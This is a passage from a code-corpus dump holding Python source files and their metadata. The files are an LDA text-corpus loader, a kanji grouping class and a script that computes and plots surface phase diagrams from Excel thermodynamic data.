"usage_type": "call"}, {"api_name": "os.path", "line_number": 288, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 292, "usage_type": "call"}, {"api_name": "os.path", "line_number": 292, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 293, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 297, "usage_type": "call"}, {"api_name": "os.path", "line_number": 297, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 305, "usage_type": "call"}, {"api_name": "os.path", "line_number": 305, "usage_type": "attribute"}, {"api_name": "torchaudio.save", "line_number": 310, "usage_type": "call"}, {"api_name": "speechbrain.dataio.dataio.read_audio", "line_number": 312, "usage_type": "call"}, {"api_name": "speechbrain.dataio", "line_number": 312, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 320, "usage_type": "call"}, {"api_name": "os.path", "line_number": 320, "usage_type": "attribute"}, {"api_name": "torchaudio.save", "line_number": 325, "usage_type": "call"}, {"api_name": "speechbrain.dataio.dataio.read_audio", "line_number": 334, "usage_type": "call"}, {"api_name": "speechbrain.dataio", "line_number": 334, "usage_type": "attribute"}, {"api_name": "speechbrain.Stage", "line_number": 355, "usage_type": "attribute"}, {"api_name": "speechbrain.Stage", "line_number": 363, "usage_type": "attribute"}, {"api_name": "speechbrain.Stage", "line_number": 364, "usage_type": "attribute"}, {"api_name": "speechbrain.Stage", "line_number": 371, "usage_type": "attribute"}, {"api_name": "speechbrain.Stage", "line_number": 372, "usage_type": "attribute"}, {"api_name": "speechbrain.Stage", "line_number": 378, "usage_type": "attribute"}, {"api_name": "speechbrain.Stage", "line_number": 398, "usage_type": "attribute"}, {"api_name": "speechbrain.Stage", "line_number": 402, "usage_type": "attribute"}, {"api_name": "speechbrain.Stage", "line_number": 405, "usage_type": "attribute"}, {"api_name": "speechbrain.Stage", "line_number": 410, "usage_type": "attribute"}, {"api_name": "speechbrain.Stage", "line_number": 413, "usage_type": "attribute"}, {"api_name": "speechbrain.Stage", "line_number": 432, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 433, "usage_type": "call"}, {"api_name": "os.path", "line_number": 433, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 438, "usage_type": "call"}, {"api_name": "os.path", "line_number": 438, "usage_type": 
"attribute"}, {"api_name": "os.makedirs", "line_number": 439, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 441, "usage_type": "call"}, {"api_name": "os.path", "line_number": 441, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 449, "usage_type": "call"}, {"api_name": "os.path", "line_number": 449, "usage_type": "attribute"}, {"api_name": "torchaudio.save", "line_number": 454, "usage_type": "call"}, {"api_name": "speechbrain.dataio.dataio.read_audio", "line_number": 456, "usage_type": "call"}, {"api_name": "speechbrain.dataio", "line_number": 456, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 462, "usage_type": "call"}, {"api_name": "os.path", "line_number": 462, "usage_type": "attribute"}, {"api_name": "torchaudio.save", "line_number": 467, "usage_type": "call"}, {"api_name": "speechbrain.dataio.dataio.read_audio", "line_number": 476, "usage_type": "call"}, {"api_name": "speechbrain.dataio", "line_number": 476, "usage_type": "attribute"}, {"api_name": "torch.IntTensor", "line_number": 506, "usage_type": "call"}, {"api_name": "speechbrain.utils.text_to_sequence.text_to_sequence", "line_number": 507, "usage_type": "call"}, {"api_name": "torchaudio.load", "line_number": 510, "usage_type": "call"}, {"api_name": "torchaudio.functional.resample", "line_number": 512, "usage_type": "call"}, {"api_name": "torchaudio.functional", "line_number": 512, "usage_type": "attribute"}, {"api_name": "speechbrain.utils.data_pipeline.takes", "line_number": 500, "usage_type": "call"}, {"api_name": "speechbrain.utils", "line_number": 500, "usage_type": "attribute"}, {"api_name": "speechbrain.utils.data_pipeline.provides", "line_number": 501, "usage_type": "call"}, {"api_name": "speechbrain.utils", "line_number": 501, "usage_type": "attribute"}, {"api_name": "speechbrain.dataio.dataset.DynamicItemDataset.from_json", "line_number": 529, "usage_type": "call"}, {"api_name": "speechbrain.dataio", "line_number": 529, "usage_type": "attribute"}, {"api_name": "speechbrain.parse_arguments", "line_number": 542, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 542, "usage_type": "attribute"}, {"api_name": "hyperpyyaml.load_hyperpyyaml", "line_number": 545, "usage_type": "call"}, {"api_name": "speechbrain.utils.distributed.ddp_init_group", "line_number": 549, "usage_type": "call"}, {"api_name": "speechbrain.utils", "line_number": 549, "usage_type": "attribute"}, {"api_name": "speechbrain.create_experiment_directory", "line_number": 552, "usage_type": "call"}, {"api_name": "sys.path.append", "line_number": 560, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 560, "usage_type": "attribute"}, {"api_name": "speechbrain.utils.distributed.run_on_main", "line_number": 563, "usage_type": "call"}, {"api_name": "libritts_prepare.prepare_libritts", "line_number": 564, "usage_type": "argument"}, {"api_name": "speechbrain.utils", "line_number": 563, "usage_type": "attribute"}, {"api_name": "speechbrain.utils.distributed.run_on_main", "line_number": 581, "usage_type": "call"}, {"api_name": "compute_speaker_embeddings.compute_speaker_embeddings", "line_number": 582, "usage_type": "argument"}, {"api_name": "speechbrain.utils", "line_number": 581, "usage_type": "attribute"}, {"api_name": "speechbrain.utils.distributed.run_on_main", "line_number": 631, "usage_type": "call"}, {"api_name": "speechbrain.utils", "line_number": 631, "usage_type": "attribute"}, {"api_name": "speechbrain.utils.train_logger.TensorboardLogger", "line_number": 639, 
"usage_type": "call"}, {"api_name": "speechbrain.utils", "line_number": 639, "usage_type": "attribute"}]} +{"seq_id": "43526719215", "text": "# -*- coding: utf-8 -*-\n\n__author__ = 'PC-LiNing'\n\nimport codecs\nfrom gensim import corpora\nfrom scipy import sparse\nimport numpy as np\nfrom collections import defaultdict\n\nstoplist = set('的 和 与 中 为 及 对 在 了 例'.split())\n\n\ndef load_texts(file):\n f = codecs.open(file,encoding='utf-8')\n texts = []\n for line in f.readlines():\n line = line.strip('\\n').strip()\n words = line.split()\n # remove stop word and single word\n texts.append([word for word in words if word not in stoplist and len(word) > 1])\n return texts\n\n\ndef load_corpus():\n texts_1 = load_texts('F:/PycharmProjects/TagPaper/lda/dataset/建筑.txt')\n # texts_2 = load_texts('F:/PycharmProjects/TagPaper/lda/心理kw.txt')\n texts_3 = load_texts('F:/PycharmProjects/TagPaper/lda/dataset/机械.txt')\n texts_4 = load_texts('F:/PycharmProjects/TagPaper/lda/dataset/计算机.txt')\n tag_list = [0]*len(texts_1) + [1]*len(texts_3) + [2]*len(texts_4)\n print(\"建筑:\"+str(len(texts_1)))\n print(\"机械:\"+str(len(texts_3)))\n print(\"计算机:\"+str(len(texts_4)))\n texts = texts_1 + texts_3 + texts_4\n \"\"\"\n # remove words that appear only once\n frequency = defaultdict(int)\n for text in texts:\n for token in text:\n frequency[token] += 1\n texts = [[token for token in text if frequency[token] > 1] for text in texts]\n \"\"\"\n dictionary = corpora.Dictionary(texts)\n corpus = [dictionary.doc2bow(text) for text in texts]\n return corpus,dictionary,np.asarray(tag_list)\n\n\ndef get_max_length(corpus):\n max_length = 0\n for line in corpus:\n if len(line) > max_length:\n max_length = len(line)\n return max_length\n\n\ndef convert_to_matrix(corpus):\n max_length = get_max_length(corpus)\n print('max length : '+str(max_length))\n matrix = np.zeros(shape=(len(corpus),max_length),dtype=np.int32)\n count = 0\n for line in corpus:\n row = np.asarray([pair[0] for pair in line]+[-1]*(max_length-len(line)),dtype=np.int32)\n matrix[count] = row\n count += 1\n return matrix\n\n\ndef get_train_test(matrix,tag_list):\n line_count = len(tag_list)\n shuffle_indices = np.random.permutation(np.arange(line_count))\n label_shuffled = tag_list[shuffle_indices]\n matrix_shuffled = matrix[shuffle_indices]\n Test_Size = line_count * 0.2\n x_train = matrix_shuffled[Test_Size:]\n y_train = label_shuffled[Test_Size:]\n x_test=matrix_shuffled[:Test_Size]\n y_test=label_shuffled[:Test_Size]\n return x_train,y_train,x_test,y_test\n\n\n# load_corpus()\n", "repo_name": "QqqingYuan/TagPaper", "sub_path": "lda/load_data.py", "file_name": "load_data.py", "file_ext": "py", "file_size_in_byte": 2574, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "codecs.open", "line_number": 15, "usage_type": "call"}, {"api_name": "gensim.corpora.Dictionary", "line_number": 43, "usage_type": "call"}, {"api_name": "gensim.corpora", "line_number": 43, "usage_type": "name"}, {"api_name": "numpy.asarray", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 59, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 62, "usage_type": "attribute"}, {"api_name": "numpy.random.permutation", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 70, "usage_type": 
"attribute"}, {"api_name": "numpy.arange", "line_number": 70, "usage_type": "call"}]} +{"seq_id": "2809916113", "text": "import math\nfrom typing import Iterable, List, TypedDict\nfrom collections import UserList\n\nfrom .entity import KanjiEntity, Jlpt\n\n\nclass KanjiListGroup(TypedDict):\n size: int\n count: int\n kanji: List[KanjiEntity]\n\n\nclass KanjiList(UserList[KanjiEntity]):\n def __init__(self, initlist: Iterable[KanjiEntity] | None = ...) -> None:\n super().__init__(initlist=initlist)\n self.data.sort(key=lambda ent: -ent.jlpt)\n\n def sort_by_ext_id(self):\n return self.data[:].sort(key=lambda ent: ent.ext_id)\n\n def group_by_jlpt(self) -> List[List[KanjiEntity]]:\n res: List[List[KanjiEntity]] = []\n\n for lvl in reversed(Jlpt):\n kanji_list = [kanji for kanji in self if kanji.jlpt == lvl.value]\n kanji_list.reverse()\n res.append(kanji_list)\n\n return res\n\n def regroup(self, max_width: int) -> List[KanjiListGroup]:\n grouped: List[KanjiListGroup] = []\n kanji_by_jlpt = self.group_by_jlpt()\n\n for i, kanji in enumerate(kanji_by_jlpt):\n length = len(kanji)\n\n try:\n count: int = length + grouped[i - 1][\"count\"]\n except Exception:\n count: int = length\n\n size = math.floor(math.sqrt(count))\n\n grouped.append(\n {\n \"count\": count,\n \"size\": max_width if i == len(kanji_by_jlpt) - 1 else size,\n \"kanji\": kanji,\n }\n )\n\n return grouped\n", "repo_name": "ChillyBwoy/powerkanji", "sub_path": "parser/powerkanji/models/list.py", "file_name": "list.py", "file_ext": "py", "file_size_in_byte": 1514, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "typing.TypedDict", "line_number": 8, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 11, "usage_type": "name"}, {"api_name": "entity.KanjiEntity", "line_number": 11, "usage_type": "name"}, {"api_name": "collections.UserList", "line_number": 14, "usage_type": "name"}, {"api_name": "entity.KanjiEntity", "line_number": 14, "usage_type": "name"}, {"api_name": "typing.Iterable", "line_number": 15, "usage_type": "name"}, {"api_name": "entity.KanjiEntity", "line_number": 15, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 23, "usage_type": "name"}, {"api_name": "entity.KanjiEntity", "line_number": 23, "usage_type": "name"}, {"api_name": "entity.Jlpt", "line_number": 25, "usage_type": "argument"}, {"api_name": "typing.List", "line_number": 22, "usage_type": "name"}, {"api_name": "entity.KanjiEntity", "line_number": 22, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 33, "usage_type": "name"}, {"api_name": "math.floor", "line_number": 44, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 44, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 32, "usage_type": "name"}]} +{"seq_id": "33810307316", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import division\nimport numpy as np\nimport pandas as pd\nimport parser\nimport shutil\n\n# blue_darkred\n# copy from veusz/utils/colormap\ncolor_map = ( # order: b,g,r\n (216, 0, 36, 255),\n (247, 28, 24, 255),\n (255, 87, 40, 255),\n (255, 135, 61, 255),\n (255, 176, 86, 255),\n (255, 211, 117, 255),\n (255, 234, 153, 255),\n (255, 249, 188, 255),\n (255, 255, 234, 255),\n (234, 255, 255, 255),\n (188, 241, 255, 255),\n (153, 214, 255, 255),\n (117, 172, 255, 255),\n (86, 120, 255, 255),\n (61, 61, 255, 255),\n (53, 39, 247, 255),\n (47, 21, 216, 255),\n (33, 0, 165, 255)\n)\n\ndef get_color(n,start=0,stop=1):\n '''\n Return a 
dict of hex colors with length n.\n The color list is an interpolation of the colormap.\n '''\n cmap = np.array(color_map)\n x0 = np.linspace(start,stop,len(color_map))\n x = np.linspace(start,stop,n).astype(np.intc)\n b = np.interp(x,x0,cmap[:,0]).astype(np.intc)\n g = np.interp(x,x0,cmap[:,1]).astype(np.intc)\n r = np.interp(x,x0,cmap[:,2]).astype(np.intc)\n clist = ['#%02x%02x%02x' % tuple(rgb) for rgb in zip(r,g,b)]\n cdict = {}\n for i,c in enumerate(clist):\n cdict[x[i]] = c\n return cdict\n\ndef start_veusz():\n # for plotting by veusz \n print(\"Preparing plotting environment ...\")\n global isveusz\n try:\n import veusz.embed\n isveusz = True\n print(\"The data will be plotted by Veusz!\")\n from xvfbwrapper import Xvfb\n vdisplay = Xvfb()\n vdisplay.start()\n embed = veusz.embed.Embedded(hidden=True)\n return embed,vdisplay\n except:\n isveusz = False\n print(\"Can't import Veusz, the data will not be plotted!\")\n return None,None\n\ndef close_veusz(embed,vdisplay):\n if isveusz:\n embed.Close()\n # vdisplay.stop()\n\ndef data_from_xls(filename): \n print('Reading input excel file ...')\n allsheet = pd.read_excel(filename,sheet_name=None)\n input_data = allsheet['data']\n ref_data = allsheet['ref']\n ref_detail = {}\n for s in allsheet:\n if s.startswith('ref_'):\n name = s[4:]\n ref_detail[name] = allsheet[s]\n print('Initialize data ...')\n data = input_data.dropna(subset=['Nads','E_Total']) # remove rows that are NaN for Nads and E_Total\n data = data.dropna(axis=0,how='all')\n return data,ref_data,ref_detail\n \ndef check_data(data,ref):\n # data is a pandas.DataFrame\n require_col = set((u'Nads', u'E_Slab', u'E_Total','Formula'))\n if not require_col.issubset(set(data.columns)):\n print('Error: Required Columns are ', ', '.join(require_col))\n\n for icol in ('Name','E_Slab','ZPE_Slab','ZPE_Total','Formula'): # fill NaN with i[0], else 0\n v = data[icol][0]\n if pd.isnull(data[icol][0]):\n v = 0\n data[icol] = data[icol].fillna(v)\n \n data = data.groupby(by=['Name','Nads'],as_index=False).agg(min) # Aggregate rows with the same Nads and take the minimum. Note: the result is not set as a new index.\n\n data['G_Slab'] = data['E_Slab'] + data['ZPE_Slab']\n data['G_Total'] = data['E_Total'] + data['ZPE_Total']\n \n return data\n\ndef check_formula(s):\n co_names = parser.expr(s).compile().co_names\n for i in co_names:\n exec(i+'=1.0') # assign name with value\n try:\n eval(s)\n except Exception as e:\n msg = \" \".join([str(e),s])\n print(msg)\n exit(0)\n \ndef parse_formula(s):\n '''\n Parse the string formula to a list.\n '''\n check_formula(s)\n result = []\n var = ''\n for i in s:\n if i in '+-*/()':\n if var != '':\n result.append(var)\n result.append(i)\n var = ''\n elif i in ' ': # strip all spaces\n pass\n else:\n var += i\n if var != '':\n result.append(var)\n return result\n\ndef rebuild_formula(s,mapping):\n '''\n Replace the vars according to the mapping and rebuild the list into a new formula string.\n mapping = {'old_var':'new_var'}\n '''\n l = parse_formula(s)\n nl = [mapping.pop(il,il) for il in l] # dict.pop is great!\n ns = ''.join(nl)\n for k in mapping: # items not in the formula are multiplied by 0\n ns += '+0*' + mapping[k]\n return ns\n \ndef new_formula(ref,formula,name):\n mapping = {}\n for k in ref[name].keys():\n mapping[k] = 'ref[\"'+name+'\"][\"'+k+'\"]'\n if name in ('S','HT'):\n mapping[k] += '(T)'\n return rebuild_formula(formula,mapping)\n\ndef get_ref(ref_data,ref_detail,formula):\n '''\n ref_data is pandas.DataFrame, formula is pandas.Series.\n '''\n variable = {} # if T or p are variables, store them\n ref = {}\n # get T\n t = 
ref_data['Temperature']\n t = t[pd.notnull(t)]\n if len(t) > 1:\n print(\"Error: Please check the temperature input!\")\n exit(0)\n elif len(t)==0:\n ref['T'] = 0 # default value for ref['T']\n else:\n t = t.iloc[0]\n if type(t) in (np.float64,np.int64,int,float): # t is a number, type is from pandas\n ref['T'] = t\n else: # t is a variable\n try:\n ref['T'] = np.array(eval(t))\n if ref['T'][0] != ref['T'][1]:\n variable['T'] = ref['T']\n else:\n ref['T'] = ref['T'][0]\n except Exception as e:\n print(\"Error: Please check the temperature format!\")\n print(e)\n exit(0)\n \n ref['S'] = {}\n ref['p'] = {}\n ref['HT'] = {}\n ref['E'] = {}\n ref['dZPE'] = {}\n ref['u'] = {}\n for nf in formula:\n co_names = set([name for name in parser.expr(nf).compile().co_names])-set(('Total','Slab','Nads'))\n for iname in co_names:\n # assign HT,E,dZPE,u,S\n row = ref_data[ref_data.Name == iname]\n if row.shape[0] != 1:\n print (\"Error: Duplicated or no row for \"+iname)\n break\n \n for r in ('E','dZPE',):\n rd = row[r]\n if rd.isnull().iloc[0]:\n print (\"Error: No E or dZPE for \"+iname)\n break\n else:\n ref[r][iname] = rd.iloc[0]\n \n for r in ('S','HT',):\n rd = row[r]\n if rd.notnull().iloc[0]:\n def func(x,c=rd.iloc[0]):\n return np.ones(len(x))*c if hasattr(x,'__iter__') else c\n else:\n if iname in ref_detail: # use S(T) and H(T)\n v = ref_detail[iname]\n if r in v.columns:\n if np.all(pd.notnull(v[r])):\n def func(x,vt=v['T'],vr=v[r]):\n return np.interp(x,vt,vr)\n else:\n print(\"Error: please check ref_\"+iname)\n break\n else:\n def func(x):\n return np.zeros(len(x)) if hasattr(x,'__iter__') else 0.0\n else:\n print (\"Error: No \"+r+\" value for \"+iname)\n break\n ref[r][iname] = func\n # assign pressure\n p = row['Press']\n\n if p.isnull().iloc[0]:\n ref['p'][iname] = None # unit ln(bar)\n else:\n if type(p.iloc[0]) in (np.float64,np.int64,int,float):\n ref['p'][iname] = np.log(p.iloc[0])\n else:\n try:\n ref['p'][iname] = np.array(np.log(eval(p.iloc[0]))) # ln(p)\n if ref['p'][iname][0] != ref['p'][iname][1]:\n if 'p' not in variable:\n variable['p'] = {} \n variable['p'][iname] = ref['p'][iname]\n else:\n ref['p'][iname] = ref['p'][iname][0]\n except Exception as e:\n print(\"Error: Please check the Press format!\")\n print(e)\n break\n # get u\n u = row['u']\n if u.isnull().iloc[0]:\n ref['u'][iname] = None # default 0\n else:\n if type(u.iloc[0]) in (np.float64,int,float):\n ref['u'][iname] = u.iloc[0]\n else:\n try:\n ref['u'][iname] = np.array(eval(u.iloc[0])) # ln(p)\n if ref['u'][iname][0] != ref['u'][iname][1]:\n if 'u' not in variable:\n variable['u'] = {} \n variable['u'][iname] = ref['u'][iname]\n else:\n ref['u'][iname] = ref['u'][iname][0]\n except Exception as e:\n print(\"Error: Please check the u format!\",e)\n print(u)\n break\n return ref,variable\n\ndef plot_1D(plot_dict):\n \"\"\"\n plot_dict keys:\n embed: veusz.embed.Embedded or None\n xlabel: str\n xdata: numpy.array\n ydata: dict, {Nads:value}\n output: str\n \"\"\"\n xdata = plot_dict['xdata']\n xlabel = plot_dict['xlabel']\n veusz_set = []\n veusz_set.append(\"SetData('x',\"+str(xdata.tolist())+\")\")\n ydata = plot_dict['ydata']\n ymin = []\n ymax = []\n for nads in ydata:\n dG = ydata[nads].tolist()\n name = 'G' + nads\n path = '/data/graph1/' + name\n veusz_set.append(\"CloneWidget('/data/graph1/template','/data/graph1','\"+name+\"')\")\n veusz_set.append(\"Set('\"+path+\"/key', '\"+nads+\"')\")\n veusz_set.append(\"Set('\"+path+\"/xData','x')\")\n veusz_set.append(\"SetData('\" + name + \"', \" +str(dG)+\")\")\n 
veusz_set.append(\"Set('\"+path+\"/yData','\"+name+\"')\")\n ymin.append(min(dG))\n ymax.append(max(dG))\n veusz_set.append(\"Set('/data/graph1/x/min',\"+str(float(min(xdata)))+\")\")\n veusz_set.append(\"Set('/data/graph1/x/max',\"+str(float(max(xdata)))+\")\")\n veusz_set.append(\"Set('/data/graph1/x/label','\"+xlabel+\"')\")\n ymin = min(ymin)\n ymax = max(ymax)\n veusz_set.append(\"Set('/data/graph1/y/min',\"+str(float(ymin-(ymax-ymin)*0.2))+\")\")\n veusz_set.append(\"Set('/data/graph1/y/max',\"+str(float(ymax+(ymax-ymin)*0.2))+\")\")\n veusz_set.append(\"Remove('/data/graph1/template')\")\n veusz_set.append(\"Remove('/contour')\")\n # save to vsz\n output_filename = plot_dict['output']\n shutil.copy2('template.vsz',output_filename+'.vsz')\n veusz_file = open(output_filename+'.vsz','a')\n for i in veusz_set:\n veusz_file.write(i+'\\n')\n veusz_file.close()\n # save data to .dat file\n print('Save data to '+output_filename+'.csv')\n ydata[xlabel] = xdata \n data_df = pd.DataFrame(ydata)\n data_df.set_index(xlabel,inplace=True)\n data_df.to_csv(output_filename+'.csv',index=True,float_format='%5.3f')\n embed = plot_dict['embed']\n if embed is not None:\n embed.Load(output_filename+'.vsz')\n print('Export to '+output_filename+'.jpg')\n embed.Export(output_filename+'.jpg',dpi=300)\n\ndef plot_2D(plot_dict):\n # 生成等值面图\n ngrid = plot_dict['ngrid']\n xdata = plot_dict['xdata']\n ydata = plot_dict['ydata']\n xgrid = plot_dict['xgrid']\n ygrid = plot_dict['ygrid']\n nmin = plot_dict['nmin']\n nmax = plot_dict['nmax']\n xlabel = plot_dict['xlabel']\n ylabel = plot_dict['ylabel']\n label = plot_dict['label']\n output_filename = plot_dict['output']\n embed = plot_dict['embed']\n print('Generate 2D contour '+output_filename)\n veusz_set = []\n veusz_set.append(\"SetData2D('grid',\"\n +str(ngrid.tolist())\n +\",xcent=\"\n +str(xdata.tolist())\n +\",ycent=\"\n +str(ydata.tolist())\n +\")\")\n veusz_set.append(\"Set('/contour/graph1/image1/min',\"+str(nmin)+\")\")\n veusz_set.append(\"Set('/contour/graph1/image1/max',\"+str(nmax)+\")\")\n ncolormap = str(nmax-nmin)\n veusz_set.append(\"Set('/contour/graph1/image1/colorMap', u'blue-darkred-step\"+ncolormap+\"')\")\n veusz_set.append(\"Set('/contour/graph1/colorbar1/MajorTicks/number', \"+ncolormap+\")\")\n level = np.unique(ngrid).tolist()\n veusz_set.append(\"Set('/contour/graph1/contour1/manualLevels', \"+str(level)+\")\")\n xmin = min(xdata)\n xmax = max(xdata)\n veusz_set.append(\"Set('/contour/graph1/x/label','\"+ xlabel+\"')\")\n veusz_set.append(\"Set('/contour/graph1/x/min',\"+str(float(xmin))+\")\")\n veusz_set.append(\"Set('/contour/graph1/x/max',\"+str(float(xmax))+\")\")\n ymin = min(ydata)\n ymax = max(ydata)\n veusz_set.append(\"Set('/contour/graph1/y/label','\"+ ylabel+\"')\")\n veusz_set.append(\"Set('/contour/graph1/y/min',\"+str(float(ymin))+\")\")\n veusz_set.append(\"Set('/contour/graph1/y/max',\"+str(float(ymax))+\")\")\n # add label and rect\n cmap = get_color(ncolormap,nmin,nmax-1)\n label_file=open(output_filename+'_labelname.dat','w')\n print(\"Label name:\")\n for ilabel in label:\n if ilabel != 0:\n label_name = 'label'+str(ilabel+1)\n rect_name = 'rect' + str(ilabel+1)\n veusz_set.append(\"CloneWidget('/contour/graph1/label1','/contour/graph1','\"+label_name+\"')\")\n veusz_set.append(\"CloneWidget('/contour/graph1/rect1','/contour/graph1','\"+rect_name+\"')\")\n else:\n label_name = 'label1'\n rect_name = 'rect1'\n # set label prop\n veusz_set.append(\"Set('/contour/graph1/\"+label_name+\"/label','\"+str(ilabel)+\"')\")\n 
yPos = 0.96-ilabel*0.07\n veusz_set.append(\"Set('/contour/graph1/\"+label_name+\"/yPos',[\"+str(yPos)+\"])\")\n # set rect prop\n yPos = 0.97-ilabel*0.07\n veusz_set.append(\"Set('/contour/graph1/\"+rect_name+\"/yPos',[\"+str(yPos)+\"])\")\n veusz_set.append(\"Set('/contour/graph1/\"+rect_name+\"/Fill/color','\"+cmap[ilabel]+\"')\")\n print(str(ilabel)+': '+label[ilabel])\n label_file.write(\"%4i\\t%s\\n\" %(ilabel,label[ilabel]))\n label_file.close()\n print(\"Label names were saved in \"+output_filename+'_labelname.dat')\n veusz_set.append(\"Remove('/data')\")\n shutil.copy2('template.vsz',output_filename+'.vsz')\n veusz_file = open(output_filename+'.vsz','a')\n for i in veusz_set:\n veusz_file.write(i+'\\n')\n veusz_file.close()\n\n # save data to .dat file\n quality_2d = xgrid.shape\n dim = quality_2d[0]*quality_2d[1]\n xyz = np.asarray([xgrid.reshape(dim),ygrid.reshape(dim),ngrid.reshape(dim)]).T\n np.savetxt(output_filename+'.dat',xyz,fmt='%.5f',header=\" \".join((xlabel,ylabel,\"N\")))\n if embed is not None:\n embed.Load(output_filename+'.vsz')\n print('Export to '+output_filename+'.jpg')\n embed.Export(output_filename+'.jpg',dpi=300)\n\ndef get_ref_u(raw_ref):\n ref = raw_ref.copy()\n # get u for all ref\n for name in ref['u']:\n T = ref['T']\n try:\n # get u directly\n print(\"Try to use u for \"+name+\" directly...\")\n ref['u'][name] = ref['u'][name]+ref['E'][name]+ref['dZPE'][name]+ref['HT'][name](T)\n print(\"Done!\")\n except Exception as e1:\n print(\"This is why u can't be used directly: \"+str(e1))\n # get u from T and p\n print(\"Try to get u from T and p ...\")\n try:\n ref['u'][name] = ref['E'][name]\n ref['u'][name] += ref['dZPE'][name]\n ref['u'][name] += ref['HT'][name](T)\n ref['u'][name] += 8.314*T*ref['p'][name]/1000/96.4853 \n ref['u'][name] -= T*ref['S'][name](T) \n print(\"Done!\")\n except Exception as e2:\n print(e2)\n print(\"Error: Please provide enough ref data: p, T or u!\")\n print(ref)\n exit(0)\n return ref\ndef phase_diagram(input_xls,quality_2d=(500,500),lprobability=False,p_threshold=0.05):\n\n input_data,ref_data,ref_detail = data_from_xls(input_xls)\n formula = input_data['Formula'] # formula is pd.Series\n ref,variable = get_ref(ref_data,ref_detail,formula)\n data = check_data(input_data,ref)\n nvar = len(variable)\n if nvar == 1:\n k = list(variable)[0]\n if k in ('p','u'):\n nvar = len(variable[k])\n print(\"Number of variables is \"+str(nvar))\n if nvar > 0:\n print(variable)\n embed,vdisplay = start_veusz()\n ref = get_ref_u(ref)\n if nvar == 1:\n vk,vv = list(variable.items())[0] \n if vk == 'T':\n T = np.linspace(vv[0],vv[1],quality_2d[0])\n xdata = T\n output = 'G_'+vk\n xlabel = 'Temperature (K)'\n # recalculate u for new T\n for name in ref['u']:\n ref['u'][name] = ref['E'][name]\n ref['u'][name] += ref['dZPE'][name]\n ref['u'][name] += ref['HT'][name](T)\n ref['u'][name] += 8.314*T*ref['p'][name]/1000/96.4853 \n ref['u'][name] -= T*ref['S'][name](T) \n elif vk == 'p':\n xlabel = 'ln(p('+ list(vv.keys())[0] + ')/p0)'\n xdata = list(vv.values())[0]\n output = 'G_'+vk+'_'+list(vv.keys())[0]\n # no need to recalculate u\n elif vk == 'u':\n xlabel = 'u('+ list(vv.keys())[0] + ') (eV)'\n xdata = list(vv.values())[0]\n output = 'G_'+vk+'_'+list(vv.keys())[0]\n # no need to recalculate u\n else:\n print('Unsupported variable!')\n exit(0)\n\n elif nvar == 2: \n \"\"\"\n Four cases: (T,p), (p1,p2), (u1,u2), (T, u)\n \"\"\" \n keys = variable.keys()\n if ('T' in keys) and ('p' in keys):\n xlabel = 'T(K)'\n pk = 
list(variable['p'].keys())[0]\n pv = list(variable['p'].values())[0]\n ylabel = 'ln(p('+ pk+ ')/p0)'\n output = \"_\".join(['T','p',pk,'2D'])\n xdata = np.linspace(variable['T'][0],variable['T'][1],quality_2d[0])\n ydata = np.linspace(pv[0],pv[1],quality_2d[1])\n xgrid,ygrid = np.meshgrid(xdata,ydata)\n ref['p'][pk] = ygrid.reshape(quality_2d[0]*quality_2d[1])\n T = xgrid.reshape(quality_2d[0]*quality_2d[1])\n # recalculate u for new T\n for name in ref['u']:\n ref['u'][name] = ref['E'][name]\n ref['u'][name] += ref['dZPE'][name]\n ref['u'][name] += ref['HT'][name](T)\n ref['u'][name] += 8.314*T*ref['p'][name]/1000/96.4853 \n ref['u'][name] -= T*ref['S'][name](T) \n\n elif ('T' in keys) and ('u' in keys):\n xlabel = 'T(K)'\n pk = list(variable['u'].keys())[0]\n pv = list(variable['u'].values())[0]\n ylabel = 'u('+ pk+ ') (eV)'\n output = \"_\".join(['T','u',pk,'2D'])\n xdata = np.linspace(variable['T'][0],variable['T'][1],quality_2d[0])\n ydata = np.linspace(pv[0],pv[1],quality_2d[1])\n xgrid,ygrid = np.meshgrid(xdata,ydata)\n ref['u'][pk] = ygrid.reshape(quality_2d[0]*quality_2d[1])\n T = xgrid.reshape(quality_2d[0]*quality_2d[1])\n # recalculate u for new T\n for name in ref['u']:\n if name != pk: # don't calculate u for pk\n ref['u'][name] = ref['E'][name]\n ref['u'][name] += ref['dZPE'][name]\n ref['u'][name] += ref['HT'][name](T)\n ref['u'][name] += 8.314*T*ref['p'][name]/1000/96.4853 \n ref['u'][name] -= T*ref['S'][name](T) \n \n elif ('p' in keys) and len(keys)==1:\n pk = list(variable['p'].keys())\n pv = list(variable['p'].values())\n xlabel = 'ln(p('+ pk[0] + ')/p0)'\n ylabel = 'ln(p('+ pk[1] + ')/p0)'\n output = \"_\".join(['p',pk[0],'p',pk[1],'2D'])\n xdata = np.linspace(pv[0][0],pv[0][1],quality_2d[0])\n ydata = np.linspace(pv[1][0],pv[1][1],quality_2d[1])\n xgrid,ygrid = np.meshgrid(xdata,ydata)\n ref['p'][pk[0]] = xgrid.reshape(quality_2d[0]*quality_2d[1])\n ref['p'][pk[1]] = ygrid.reshape(quality_2d[0]*quality_2d[1])\n # recalculate u for new p\n T = ref['T']\n for name in pk: # not for 